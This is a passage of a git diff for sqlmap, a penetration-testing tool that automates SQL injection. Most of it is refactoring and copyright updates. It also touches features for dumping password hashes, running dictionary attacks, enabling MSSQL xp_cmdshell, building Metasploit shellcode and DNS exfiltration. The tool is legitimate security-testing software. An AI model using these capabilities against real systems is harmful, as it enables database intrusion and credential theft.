2): - break - else: - warnMsg = "invalid value, valid values are 1 and 2" + warnMsg = "invalid value, valid values are '1' and '2'" logger.warn(warnMsg) if choice == 1: @@ -336,11 +329,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): msg = "this technique is likely to DoS the DBMS process, are you " msg += "sure that you want to carry with the exploit? [y/N] " - choice = readInput(msg, default="N") - dos = choice and choice[0].lower() == "y" - - if dos: + if readInput(msg, default='N', boolean=True): self.initEnv(mandatory=False, detailed=True) self.getRemoteTempPath() self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) @@ -460,9 +450,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): message = "are you sure that you want to delete the Windows " message += "registry path '%s\%s? [y/N] " % (regKey, regVal) - output = readInput(message, default="N") - if output and output[0] not in ("Y", "y"): + if not readInput(message, default='N', boolean=True): return infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 41081dac1..b09169dff 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -27,10 +27,11 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DB2_PRIVS +from lib.core.dicts import FIREBIRD_PRIVS +from lib.core.dicts import INFORMIX_PRIVS from lib.core.dicts import MYSQL_PRIVS from lib.core.dicts import PGSQL_PRIVS -from lib.core.dicts import FIREBIRD_PRIVS -from lib.core.dicts import DB2_PRIVS from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -160,7 +161,7 @@ class Users: conf.user = conf.user.upper() if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: @@ -251,22 +252,25 @@ class Users: if user in retrievedUsers: continue - infoMsg = "fetching number of password hashes " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.count2 % user + if Backend.isDbms(DBMS.INFORMIX): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of password hashes " + infoMsg += "for user '%s'" % user + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of password " - warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + warnMsg = "unable to retrieve the number of password " + warnMsg += "hashes for user '%s'" % user + logger.warn(warnMsg) + continue infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) @@ -282,11 +286,14 @@ class Users: query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (user,) else: query = rootQuery.blind.query % (user, index) password = unArrayizeValue(inject.getValue(query, union=False, error=False)) password = parsePasswordHash(password) + passwords.append(password) if passwords: @@ -312,11 +319,11 @@ class Users: message = "do you want to perform a dictionary-based attack " message += "against retrieved password hashes? [Y/n/q]" - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if test[0] in ("n", "N"): + if choice == 'N': pass - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: attackCachedUsersPasswords() @@ -338,7 +345,7 @@ class Users: conf.user = conf.user.upper() if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: @@ -417,12 +424,13 @@ class Users: # In Firebird we get one letter for each privilege elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + if privilege.strip() in FIREBIRD_PRIVS: + privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] if len(privs) > 1: privs = privs[1] @@ -470,32 +478,35 @@ class Users: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: user = "%%%s%%" % user - infoMsg = "fetching number of privileges " - infoMsg += "for user '%s'" % outuser - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 % user - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.count % (conditionChar, user) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.count2 % user + if Backend.isDbms(DBMS.INFORMIX): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of privileges " + infoMsg += "for user '%s'" % outuser + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: + query = rootQuery.blind.count2 % user + elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: + query = rootQuery.blind.count % (conditionChar, user) + elif Backend.isDbms(DBMS.ORACLE) and query2: + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - return self.getPrivileges(query2=True) + if not isNumPosStrValue(count): + if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: + infoMsg = "trying with table USER_SYS_PRIVS" + logger.info(infoMsg) - warnMsg = "unable to retrieve the number of " - warnMsg += "privileges for user '%s'" % outuser - logger.warn(warnMsg) - continue + return self.getPrivileges(query2=True) + + warnMsg = "unable to retrieve the number of " + warnMsg += "privileges for user '%s'" % outuser + logger.warn(warnMsg) + continue infoMsg = "fetching privileges for user '%s'" % outuser logger.info(infoMsg) @@ -514,6 +525,8 @@ class Users: query = rootQuery.blind.query2 % (user, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, user) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (user,) else: query = rootQuery.blind.query % (user, index) @@ -525,8 +538,8 @@ class Users: # In PostgreSQL we get 1 if the privilege is True, # 0 otherwise if Backend.isDbms(DBMS.PGSQL) and ", " in privilege: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: @@ -545,12 +558,12 @@ class Users: # In MySQL < 5.0 we get Y if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: - if priv.upper() == "Y": + if priv.upper() == 'Y': for position, mysqlPriv in MYSQL_PRIVS.items(): if position == i: privileges.add(mysqlPriv) @@ -561,17 +574,21 @@ class Users: elif Backend.isDbms(DBMS.FIREBIRD): privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + # In Informix we get one letter for the highest privilege + elif Backend.isDbms(DBMS.INFORMIX): + privileges.add(INFORMIX_PRIVS[privilege.strip()]) + # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] privs = privs[1] privs = list(privs.strip()) i = 1 for priv in privs: - if priv.upper() in ("Y", "G"): + if priv.upper() in ('Y', 'G'): for position, db2Priv in DB2_PRIVS.items(): if position == i: privilege += ", " + db2Priv diff --git a/procs/mssqlserver/configure_xp_cmdshell.sql b/procs/mssqlserver/configure_xp_cmdshell.sql index 349c8cf8c..e23e4b06a 100644 --- a/procs/mssqlserver/configure_xp_cmdshell.sql +++ b/procs/mssqlserver/configure_xp_cmdshell.sql @@ -2,5 +2,5 @@ EXEC master..sp_configure 'show advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options',0; +EXEC master..sp_configure 'show advanced options',0; RECONFIGURE WITH OVERRIDE diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index dd04d8663..6724af223 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ diff --git a/sqlmap.conf b/sqlmap.conf index d7db6c376..9386ace16 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -93,10 +93,26 @@ authType = # Syntax: username:password authCred = -# HTTP Authentication PEM private key. Useful only if the target URL requires +# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires # PKI authentication and you have such data. # Syntax: key_file -authPrivate = +authFile = + +# Ignore HTTP Error 401 (Unauthorized). +# Valid: True or False +ignore401 = False + +# Ignore system default proxy settings. +# Valid: True or False +ignoreProxy = False + +# Ignore redirection attempts. +# Valid: True or False +ignoreRedirects = False + +# Ignore connection timeouts. +# Valid: True or False +ignoreTimeouts = False # Use a proxy to connect to the target URL. # Syntax: (http|https|socks4|socks5)://address:port @@ -110,10 +126,6 @@ proxyCred = # Load proxy list from a file proxyFile = -# Ignore system default proxy settings. -# Valid: True or False -ignoreProxy = False - # Use Tor anonymity network. # Valid: True or False tor = False @@ -124,7 +136,7 @@ tor = False # Set Tor proxy type. # Valid: HTTP, SOCKS4, SOCKS5 -torType = HTTP +torType = SOCKS5 # Check to see if Tor is used properly. # Valid: True or False @@ -222,10 +234,13 @@ testParameter = # Skip testing for given parameter(s). skip = -# Skip testing parameters that not appear dynamic. +# Skip testing parameters that not appear to be dynamic. # Valid: True or False skipStatic = False +# Regexp to exclude parameters from testing (e.g. "ses"). +paramExclude = + # Force back-end DBMS to this value. If this option is set, the back-end # DBMS identification process will be minimized as needed. # If not set, sqlmap will detect back-end DBMS automatically by default. @@ -369,7 +384,7 @@ uFrom = # Domain name used for DNS exfiltration attack # Valid: string -dnsName = +dnsDomain = # Resulting page URL searched for second-order response # Valid: string @@ -482,6 +497,9 @@ col = # Back-end database management system database table column(s) to not enumerate. excludeCol = +# Pivot column name. +pivotColumn = + # Use WHERE condition while table dumping (e.g. "id=1"). dumpWhere = @@ -494,13 +512,13 @@ excludeSysDbs = False # First query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will start to retrieve the query output entries from -# the first) +# Default: 0 (sqlmap will start to retrieve the table dump entries from +# first one) limitStart = 0 # Last query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will detect the number of query output entries and +# Default: 0 (sqlmap will detect the number of table dump entries and # retrieve them until the last) limitStop = 0 @@ -650,9 +668,15 @@ trafficFile = # Valid: True or False batch = False +# Result fields having binary values (e.g. "digest"). +binaryFields = + # Force character encoding used for data retrieval. charset = +# Check Internet connection before assessing the target. +checkInternet = False + # Crawl the website starting from the target URL. # Valid: integer # Default: 0 @@ -697,9 +721,6 @@ outputDir = # Valid: True or False parseErrors = False -# Pivot column name. -pivotColumn = - # Regular expression for filtering targets from provided Burp. # or WebScarab proxy log. # Example: (google|yahoo) @@ -708,6 +729,9 @@ scope = # Select tests by payloads and/or titles (e.g. ROW) testFilter = +# Skip tests by payloads and/or titles (e.g. BENCHMARK) +testSkip = + # Update sqlmap. # Valid: True or False updateAll = False @@ -758,14 +782,20 @@ mobile = False # Valid: True or False offline = False -# Display page rank (PR) for Google dork results. +# Skip heuristic detection of WAF/IPS/IDS protection. # Valid: True or False -pageRank = False +skipWaf = False # Conduct thorough tests only if positive heuristic(s). # Valid: True or False smart = False +# Local directory for storing temporary files. +tmpDir = + +# Web server document root directory (e.g. "/var/www"). +webRoot = + # Simple wizard interface for beginner users. # Valid: True or False wizard = False diff --git a/sqlmap.py b/sqlmap.py index 6bb12a56f..5d859f611 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -1,17 +1,28 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import sys + +sys.dont_write_bytecode = True + +__import__("lib.utils.versioncheck") # this has to be the first non-standard import + import bdb +import distutils +import glob import inspect +import json import logging import os import re import shutil import sys +import thread +import threading import time import traceback import warnings @@ -19,35 +30,46 @@ import warnings warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) warnings.filterwarnings(action="ignore", category=DeprecationWarning) -from lib.utils import versioncheck # this has to be the first non-standard import - -from lib.controller.controller import start -from lib.core.common import banner -from lib.core.common import createGithubIssue -from lib.core.common import dataToStdout -from lib.core.common import getUnicode -from lib.core.common import maskSensitiveData -from lib.core.common import setPaths -from lib.core.common import weAreFrozen -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import kb from lib.core.data import logger -from lib.core.data import paths -from lib.core.common import unhandledExceptionMessage -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapShellQuitException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import initOptions -from lib.core.option import init -from lib.core.profiling import profile -from lib.core.settings import LEGAL_DISCLAIMER -from lib.core.testing import smokeTest -from lib.core.testing import liveTest -from lib.parse.cmdline import cmdLineParser -from lib.utils.api import setRestAPILog -from lib.utils.api import StdDbOut + +try: + from lib.controller.controller import start + from lib.core.common import banner + from lib.core.common import checkIntegrity + from lib.core.common import createGithubIssue + from lib.core.common import dataToStdout + from lib.core.common import getSafeExString + from lib.core.common import getUnicode + from lib.core.common import maskSensitiveData + from lib.core.common import openFile + from lib.core.common import setPaths + from lib.core.common import weAreFrozen + from lib.core.data import cmdLineOptions + from lib.core.data import conf + from lib.core.data import kb + from lib.core.common import unhandledExceptionMessage + from lib.core.common import MKSTEMP_PREFIX + from lib.core.exception import SqlmapBaseException + from lib.core.exception import SqlmapShellQuitException + from lib.core.exception import SqlmapSilentQuitException + from lib.core.exception import SqlmapUserQuitException + from lib.core.option import initOptions + from lib.core.option import init + from lib.core.profiling import profile + from lib.core.settings import GIT_PAGE + from lib.core.settings import IS_WIN + from lib.core.settings import LEGAL_DISCLAIMER + from lib.core.settings import THREAD_FINALIZATION_TIMEOUT + from lib.core.settings import UNICODE_ENCODING + from lib.core.settings import VERSION + from lib.core.testing import smokeTest + from lib.core.testing import liveTest + from lib.parse.cmdline import cmdLineParser +except KeyboardInterrupt: + errMsg = "user aborted" + logger.error(errMsg) + + raise SystemExit def modulePath(): """ @@ -60,7 +82,33 @@ def modulePath(): except NameError: _ = inspect.getsourcefile(modulePath) - return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding()) + return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) + +def checkEnvironment(): + try: + os.path.isdir(modulePath()) + except UnicodeEncodeError: + errMsg = "your system does not properly handle non-ASCII paths. " + errMsg += "Please move the sqlmap's directory to the other location" + logger.critical(errMsg) + raise SystemExit + + if distutils.version.LooseVersion(VERSION) < distutils.version.LooseVersion("1.0"): + errMsg = "your runtime environment (e.g. PYTHONPATH) is " + errMsg += "broken. Please make sure that you are not running " + errMsg += "newer versions of sqlmap with runtime scripts for older " + errMsg += "versions" + logger.critical(errMsg) + raise SystemExit + + # Patch for pip (import) environment + if "sqlmap.sqlmap" in sys.modules: + for _ in ("cmdLineOptions", "conf", "kb"): + globals()[_] = getattr(sys.modules["lib.core.data"], _) + + for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"): + globals()[_] = getattr(sys.modules["lib.core.exception"], _) + def main(): """ @@ -68,31 +116,25 @@ def main(): """ try: - paths.SQLMAP_ROOT_PATH = modulePath() - - try: - os.path.isdir(paths.SQLMAP_ROOT_PATH) - except UnicodeEncodeError: - errMsg = "your system does not properly handle non-ASCII paths. " - errMsg += "Please move the sqlmap's directory to the other location" - logger.error(errMsg) - exit() - - setPaths() + checkEnvironment() + setPaths(modulePath()) + banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) - if hasattr(conf, "api"): + if conf.get("api"): + # heavy imports + from lib.utils.api import StdDbOut + from lib.utils.api import setRestAPILog + # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() - banner() - conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) @@ -106,11 +148,22 @@ def main(): elif conf.liveTest: liveTest() else: - start() + try: + start() + except thread.error as ex: + if "can't start new thread" in getSafeExString(ex): + errMsg = "unable to start new threads. Please check OS (u)limits" + logger.critical(errMsg) + raise SystemExit + else: + raise except SqlmapUserQuitException: errMsg = "user quit" - logger.error(errMsg) + try: + logger.error(errMsg) + except KeyboardInterrupt: + pass except (SqlmapSilentQuitException, bdb.BdbQuit): pass @@ -119,19 +172,30 @@ def main(): cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: - errMsg = getUnicode(ex.message) - logger.critical(errMsg) - sys.exit(1) + errMsg = getSafeExString(ex) + try: + logger.critical(errMsg) + except KeyboardInterrupt: + pass + raise SystemExit except KeyboardInterrupt: print + errMsg = "user aborted" - logger.error(errMsg) + try: + logger.error(errMsg) + except KeyboardInterrupt: + pass except EOFError: print errMsg = "exit" - logger.error(errMsg) + + try: + logger.error(errMsg) + except KeyboardInterrupt: + pass except SystemExit: pass @@ -140,56 +204,161 @@ def main(): print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() + valid = checkIntegrity() - for match in re.finditer(r'File "(.+?)", line', excMsg): - file_ = match.group(1) - file_ = os.path.relpath(file_, os.path.dirname(__file__)) - file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_).lstrip('/') - excMsg = excMsg.replace(match.group(1), file_) + try: + if valid is False: + errMsg = "code integrity check failed (turning off automatic issue creation). " + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit - errMsg = maskSensitiveData(errMsg) - excMsg = maskSensitiveData(excMsg) + elif "tamper/" in excMsg: + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit - logger.critical(errMsg) - kb.stickyLevel = logging.CRITICAL - dataToStdout(excMsg) - createGithubIssue(errMsg, excMsg) + elif "MemoryError" in excMsg: + errMsg = "memory exhaustion detected" + logger.error(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): + errMsg = "no space left on output device" + logger.error(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): + errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.error(errMsg) + raise SystemExit + + elif "Read-only file system" in excMsg: + errMsg = "output device is mounted as read-only" + logger.error(errMsg) + raise SystemExit + + elif "OperationalError: disk I/O error" in excMsg: + errMsg = "I/O error on output device" + logger.error(errMsg) + raise SystemExit + + elif "_mkstemp_inner" in excMsg: + errMsg = "there has been a problem while accessing temporary files" + logger.error(errMsg) + raise SystemExit + + elif "can't start new thread" in excMsg: + errMsg = "there has been a problem while creating new thread instance. " + errMsg += "Please make sure that you are not running too many processes" + if not IS_WIN: + errMsg += " (or increase the 'ulimit -u' value)" + logger.error(errMsg) + raise SystemExit + + elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): + errMsg = "there has been a problem in enumeration. " + errMsg += "Because of a considerable chance of false-positive case " + errMsg += "you are advised to rerun with switch '--flush-session'" + logger.error(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("pymysql", "configparser")): + errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" + logger.error(errMsg) + raise SystemExit + + elif "bad marshal data (unknown type code)" in excMsg: + match = re.search(r"\s*(.+)\s+ValueError", excMsg) + errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") + errMsg += ". Please delete .pyc files on your system to fix the problem" + logger.error(errMsg) + raise SystemExit + + elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): + raise SystemExit + + for match in re.finditer(r'File "(.+?)", line', excMsg): + file_ = match.group(1) + file_ = os.path.relpath(file_, os.path.dirname(__file__)) + file_ = file_.replace("\\", '/') + file_ = re.sub(r"\.\./", '/', file_).lstrip('/') + excMsg = excMsg.replace(match.group(1), file_) + + errMsg = maskSensitiveData(errMsg) + excMsg = maskSensitiveData(excMsg) + + if conf.get("api") or not valid: + logger.critical("%s\n%s" % (errMsg, excMsg)) + else: + logger.critical(errMsg) + kb.stickyLevel = logging.CRITICAL + dataToStdout(excMsg) + createGithubIssue(errMsg, excMsg) + + except KeyboardInterrupt: + pass finally: + kb.threadContinue = False + if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) - if kb.get("tempDir"): - shutil.rmtree(kb.tempDir, ignore_errors=True) - - kb.threadContinue = False kb.threadException = True + if kb.get("tempDir"): + for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): + for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): + try: + os.remove(filepath) + except OSError: + pass + if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))): + shutil.rmtree(kb.tempDir, ignore_errors=True) + if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass + if conf.harFile: + with openFile(conf.harFile, "w+b") as f: + f.write(json.dumps(conf.httpCollector.obtain(), indent=4, separators=(',', ': '))) + if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() main() - if hasattr(conf, "api"): + if conf.get("api"): try: - conf.database_cursor.disconnect() + conf.databaseCursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if conf.get("threads", 0) > 1 or conf.get("dnsServer"): - os._exit(0) + # short delay for thread finalization + try: + _ = time.time() + while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: + time.sleep(0.01) + except KeyboardInterrupt: + pass + finally: + # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program + if threading.activeCount() > 1: + os._exit(0) if __name__ == "__main__": main() diff --git a/sqlmapapi.py b/sqlmapapi.py index 03a2807e7..09c1a9340 100755 --- a/sqlmapapi.py +++ b/sqlmapapi.py @@ -1,46 +1,54 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import logging import optparse +import sys + +sys.dont_write_bytecode = True + +__import__("lib.utils.versioncheck") # this has to be the first non-standard import from sqlmap import modulePath from lib.core.common import setPaths -from lib.core.data import paths from lib.core.data import logger +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT from lib.utils.api import client from lib.utils.api import server -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 - -if __name__ == "__main__": +def main(): """ REST-JSON API main function """ + # Set default logging level to debug logger.setLevel(logging.DEBUG) - # Initialize path variable - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() + # Initialize paths + setPaths(modulePath()) # Parse command line options apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_SERVER_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_SERVER_PORT, action="store_true") - apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_SERVER_HOST, action="store") - apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server", default=RESTAPI_SERVER_PORT, type="int", action="store") + apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store") + apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store") + apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") (args, _) = apiparser.parse_args() # Start the client or the server if args.server is True: - server(args.host, args.port) + server(args.host, args.port, adapter=args.adapter) elif args.client is True: client(args.host, args.port) else: apiparser.print_help() + +if __name__ == "__main__": + main() diff --git a/tamper/__init__.py b/tamper/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/tamper/__init__.py +++ b/tamper/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index 78c17f328..7504f0c48 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index 6b0930679..cd2a4d115 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index faae3a2e4..b727af909 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/base64encode.py b/tamper/base64encode.py index cda5619dd..c6b460b91 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/between.py b/tamper/between.py index f7331bd9f..26358fa86 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index a26cdadf7..7e971b1f5 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index 3b6a5301f..93623eeba 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/charencode.py b/tamper/charencode.py index 9df3e9624..ee2339e72 100644 --- 